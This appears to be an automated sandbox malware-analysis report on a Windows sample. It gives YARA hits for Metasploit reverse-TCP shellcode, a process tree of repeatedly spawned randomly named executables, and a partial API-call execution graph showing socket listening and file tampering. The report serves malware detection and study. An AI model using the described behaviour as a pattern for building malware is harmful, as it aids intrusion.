Commandline: "C:\Users\user\Desktop\PfBjDhHzvV.exe"
Imagebase: 0x400000
File size: 2'969'674 bytes
MD5 hash: 31BBB64AA3C1753CD99C865869B58023
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000003.1375059861.0000000004500000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 00000000.00000003.1375059861.0000000004500000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.2246784875.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 00000000.00000002.2246784875.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.2233936236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 00000000.00000002.2233936236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
Reputation: low
Has exited: true

Target ID: 2
Start time: 03:38:12
Start date: 18/10/2024
Path: C:\Windows\System32\fontdrvhost.exe
Wow64 process (32bit): false
Commandline: "fontdrvhost.exe"
Imagebase: 0x7ff6080a0000
File size: 827'408 bytes
MD5 hash: BBCB897697B3442657C7D6E3EDDBD25F
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 3
Start time: 03:38:13
Start date: 18/10/2024
Path: C:\Windows\System32\dllhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
Imagebase: 0x7ff7d8730000
File size: 21'312 bytes
MD5 hash: 08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 4
Start time: 03:38:13
Start date: 18/10/2024
Path: C:\Windows\System32\fontdrvhost.exe
Wow64 process (32bit): false
Commandline: "fontdrvhost.exe"
Imagebase: 0x7ff6080a0000
File size: 827'408 bytes
MD5 hash: BBCB897697B3442657C7D6E3EDDBD25F
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 5
Start time: 03:38:14
Start date: 18/10/2024
Path: C:\Windows\System32\dwm.exe
Wow64 process (32bit): false
Commandline: "dwm.exe"
Imagebase: 0x7ff74b010000
File size: 94'720 bytes
MD5 hash: 5C27608411832C5B39BA04E33D53536C
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 6
Start time: 03:38:17
Start date: 18/10/2024
Path: C:\Windows\System32\sihost.exe
Wow64 process (32bit): false
Commandline: sihost.exe
Imagebase: 0x7ff77a4d0000
File size: 111'616 bytes
MD5 hash: A21E7719D73D0322E2E7D61802CB8F80
Has elevated privileges: false
Has administrator privileges: false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                  Start time:03:38:18
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                                                                                                                                                                  Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                  Start time:03:38:18
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService
                                                                                                                                                                                                                                  Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                  Start time:03:38:19
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\ctfmon.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"ctfmon.exe"
                                                                                                                                                                                                                                  Imagebase:0x7ff7d83b0000
                                                                                                                                                                                                                                  File size:11'264 bytes
                                                                                                                                                                                                                                  MD5 hash:B625C18E177D5BEB5A6F6432CCF46FB3
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                  Start time:03:38:19
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                                  Imagebase:0x7ff70ffd0000
                                                                                                                                                                                                                                  File size:5'141'208 bytes
                                                                                                                                                                                                                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                  Start time:03:38:25
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                                                                                                  Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                  Start time:03:38:25
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                  Imagebase:0x7ff69c330000
                                                                                                                                                                                                                                  File size:793'416 bytes
                                                                                                                                                                                                                                  MD5 hash:5CDDF06A40E89358807A2B9506F064D9
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                  Start time:03:38:30
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                  Imagebase:0x7ff6bd830000
                                                                                                                                                                                                                                  File size:103'288 bytes
                                                                                                                                                                                                                                  MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                                                  Start time:03:38:31
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                  Imagebase:0x7ff7fd570000
                                                                                                                                                                                                                                  File size:3'671'400 bytes
                                                                                                                                                                                                                                  MD5 hash:5E1C9231F1F1DCBA168CA9F3227D9168
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:16
Start time:03:38:38
Start date:18/10/2024
Path:C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
Imagebase:0x7ff72cfc0000
File size:1'663'328 bytes
MD5 hash:9B8DE9D4EDF68EEF2C1E490ABC291567
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:18
Start time:03:38:47
Start date:18/10/2024
Path:C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:0x7ff6bd830000
File size:103'288 bytes
MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:19
Start time:03:38:48
Start date:18/10/2024
Path:C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:0x7ff6bd830000
File size:103'288 bytes
MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:20
Start time:03:38:49
Start date:18/10/2024
Path:C:\Windows\System32\smartscreen.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\smartscreen.exe -Embedding
Imagebase:0x7ff7ab740000
File size:2'378'752 bytes
MD5 hash:02FB7069B8D8426DC72C9D8A495AF55A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:03:38:50
Start date:18/10/2024
Path:C:\Windows\System32\ApplicationFrameHost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\ApplicationFrameHost.exe -Embedding
Imagebase:0x7ff7df270000
File size:78'456 bytes
MD5 hash:D58A8A987A8DAFAD9DC32A548CC061E7
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:22
Start time:03:38:51
Start date:18/10/2024
Path:C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca
Imagebase:0x7ff755410000
File size:19'456 bytes
MD5 hash:6C44453CD661FC2DB18E4C09C4940399
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:23
Start time:03:38:52
Start date:18/10/2024
Path:C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:0x7ff6bd830000
File size:103'288 bytes
MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:24
Start time:03:38:52
Start date:18/10/2024
Path:C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
Imagebase:0x7ff6b6580000
File size:19'232 bytes
MD5 hash:F050189D49E17D0D340DE52E9E5B711F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:25
Start time:03:38:53
Start date:18/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0x4
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:26
Start time:03:38:54
Start date:18/10/2024
Path:C:\Windows\System32\backgroundTaskHost.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX4325622ft6437f3xfywcfxgbedfvpn0x.mca
Imagebase:0x7ff644d60000
File size:19'776 bytes
MD5 hash:DA7063B17DBB8BBB3015351016868006
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:03:38:54
Start date:18/10/2024
Path:C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                  Imagebase:0x7ff6bd830000
                                                                                                                                                                                                                                  File size:103'288 bytes
                                                                                                                                                                                                                                  MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                                                  Start time:03:38:55
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                                                                                                                                                                                  Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                                                  Start time:03:38:56
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe"
                                                                                                                                                                                                                                  Imagebase:0x380000
                                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                                                                  Start time:03:38:56
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe"
                                                                                                                                                                                                                                  Imagebase:0x380000
                                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                                                                  Start time:03:38:57
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe"
                                                                                                                                                                                                                                  Imagebase:0x380000
                                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                                                                  Start time:03:38:57
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe"
                                                                                                                                                                                                                                  Imagebase:0x380000
                                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                                                                  Start time:03:38:57
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe"
                                                                                                                                                                                                                                  Imagebase:0x380000
                                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                                                                  Start time:03:38:57
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe"
                                                                                                                                                                                                                                  Imagebase:0x380000
                                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  Target ID:35
                                                                                                                                                                                                                                  Start time:03:38:58
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe"
                                                                                                                                                                                                                                  Imagebase:0x380000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:36
Start time:03:38:58
Start date:18/10/2024
Path:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe"
Imagebase:0x380000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:37
Start time:03:38:58
Start date:18/10/2024
Path:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe"
Imagebase:0x380000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:38
Start time:03:38:59
Start date:18/10/2024
Path:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe"
Imagebase:0x380000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:39
Start time:03:38:59
Start date:18/10/2024
Path:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe"
Imagebase:0x380000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:40
Start time:03:38:59
Start date:18/10/2024
Path:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe"
Imagebase:0x380000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Execution Graph

Execution Coverage:21.4%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:19.6%
Total number of Nodes:1812
Total number of Limit Nodes:52
7519->7520 7520->7513 7522 1298060 7521->7522 7523 1287a47 htons socket 7522->7523 7524 1287b20 setsockopt bind 7523->7524 7525 1287b1b 7523->7525 7524->7525 7532 1287b69 7524->7532 7527 1287c2a closesocket 7525->7527 7528 1287c37 RtlExitUserThread 7525->7528 7526 1287b76 GlobalAlloc recvfrom 7529 1287c0f GlobalFree 7526->7529 7530 1287be6 CreateThread 7526->7530 7527->7528 7533 1287c47 7528->7533 7529->7532 7531 12841c6 3 API calls 7530->7531 8743 128777d 7530->8743 7534 1287c0a 7531->7534 7532->7525 7532->7526 7534->7532 7536 1284275 7535->7536 7537 12842dc RtlExitUserThread 7536->7537 7538 12842cf Sleep 7536->7538 7539 12842a6 WaitForSingleObject 7536->7539 7540 12841c6 3 API calls 7536->7540 7538->7536 7539->7536 7540->7536 7541->7381 7543 128a28f SetFileAttributesA DeleteFileA 7542->7543 7544 128a277 7542->7544 7547 128a28d 7543->7547 7549 128e329 7544->7549 7547->7393 7548->7393 7550 128e353 7549->7550 7659 12844cb InterlockedExchange 7550->7659 7552 128e456 7660 12844cb InterlockedExchange 7552->7660 7554 128a284 7554->7543 7554->7547 7555 128e714 7556 128e71d MultiByteToWideChar 7555->7556 7557 128e753 RtlEnterCriticalSection 7555->7557 7558 128e748 7556->7558 7562 128e778 7557->7562 7558->7554 7558->7557 7559 128e6fd 7561 128a26e 6 API calls 7559->7561 7560 128e499 7560->7554 7560->7555 7560->7559 7561->7554 7563 128e7b6 GetLocalTime GetFileAttributesA SetFileAttributesA 7562->7563 7564 128e7f2 CreateFileA 7563->7564 7565 128e7e6 7563->7565 7566 128e81d GetFileSize 7564->7566 7567 128e832 7564->7567 7569 12908ef RtlLeaveCriticalSection 7565->7569 7570 12908de GlobalFree 7565->7570 7566->7567 7568 129088b CloseHandle SetFileAttributesA 7567->7568 7574 128e85f GetFileTime CreateFileMappingA 7567->7574 7571 12908af 7568->7571 7572 12908b5 DeleteFileA 7568->7572 7569->7554 7573 129090a Sleep 7569->7573 7570->7569 7571->7565 7571->7572 7572->7565 7573->7554 7575 128e8c2 MapViewOfFile 7574->7575 7580 128eb53 7574->7580 7575->7580 7588 128e8e4 7575->7588 7576 
